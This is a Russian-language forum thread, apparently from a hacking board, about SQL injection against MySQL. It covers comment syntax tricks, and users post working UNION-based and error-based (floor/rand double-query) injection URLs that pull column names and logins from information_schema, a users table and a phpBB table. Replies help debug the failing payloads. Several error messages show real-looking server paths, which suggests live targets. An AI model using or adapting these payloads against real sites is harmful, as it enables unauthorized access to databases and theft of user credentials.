Прежде всего, с ходу внесу лепту в старую как мир тему с пробелами посте однострочный mysql-style комментариев. Я, может, и не тяну на уровень гроссмейстеров кавычки с красноточек, но кусок документации об этом уже привели (более того, примерно в этой же теме десятками страниц назад я его уже приводил).
В переводе на простой и всем понятный русский,
после mysql-style комментария в виде двух минусов(тире\дефисов?)
должен стоять
пробельный символ, которым может быть перенос строки, конец строки и вообще вся веселая группа пробельных ascii-символов. Как минимум, это то, что говорит документация, и то, что подтверждается практикой на нескольких mysql-серверах пятой ветки.
Непосредственно же при инъекции пробел ставить
иногда не обязательно тупо потому, что необходимый символ уже вставляется в запрос.
Касательно же пустого многострочного комментария - он заменяется на один пробел, что также может использоваться как замена пробелам.
Сообщение от
None
Выдает users
Дальше пишу
http://www.site.com/gallery.php?id=-3+union+select+1,column_name,3,4%20from%20informat ion_schema.columns%20where%20table_name=%27users%2 7%20limit%200,1%20--
Пишет Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/host1222787/xn----itbkhedijai2ag0kya.xn--p1ai/htdocs/www/cgi-bin/gallery.php on line 14
В чем моя ошибка?
Таблица, вероятно, из другой базы, ваш же первый запрос выводит только имена.
Сообщение от
None
Точно такой же запрос, для получения логина
Цитата:
site.ru/?page=19 and(select 1 from(select count(*),concat((select (select (select concat(0x27,0x7e,user.login,0x27,0x7e) from `db_site`.user Order by id limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
На что выдает ошибку Subquery returns more than 1 row
Как ни странно, подзапрос возвращает больше одного ряда. Используйте однозначные запросы, лимиты по возможности или concat для объединения.
Сообщение от
None
madhatter, спасибо за ответ.
И еще вопрос.
Нашел уязвимость, таблица phpbb_acl_users, колонка user_id
Пишу http://www.site.com/pages.php?id=-10%20union%20select%201,user_id,3,4,5,6,7,8,9,10%2 0from%20phpbb_acl_users%20limit%200,1--
Выдает ошибку Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/mamacass/public_html/pages.php on line 12
Что я делаю не так?
Запрос завернулся в false - ошибка при выполнении.